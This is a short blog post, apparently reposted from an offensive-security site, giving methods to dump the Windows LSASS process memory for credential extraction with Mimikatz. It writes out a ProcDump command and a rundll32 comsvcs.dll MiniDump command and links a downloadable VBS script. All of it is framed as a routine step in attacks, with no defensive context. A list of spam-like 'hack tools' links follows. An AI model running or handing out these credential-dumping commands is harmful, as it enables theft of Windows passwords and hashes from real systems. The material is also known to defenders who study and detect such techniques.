terça-feira, 14 de abril de 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com
Related posts

  1. Hack Tools
  2. Hak5 Tools
  3. Hacker Tools For Ios
  4. Pentest Tools Port Scanner
  5. Hack App
  6. Hacking Tools For Pc
  7. Hacking Tools Software
  8. New Hack Tools
  9. Hacking Apps
  10. Pentest Tools Subdomain
  11. Pentest Tools Online
  12. Underground Hacker Sites
  13. Hack App
  14. Pentest Box Tools Download
  15. Pentest Tools Website Vulnerability
  16. Best Hacking Tools 2019
  17. Hack Tool Apk No Root
  18. Hacking Tools And Software
  19. Best Pentesting Tools 2018
  20. Pentest Tools Apk
  21. Beginner Hacker Tools
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)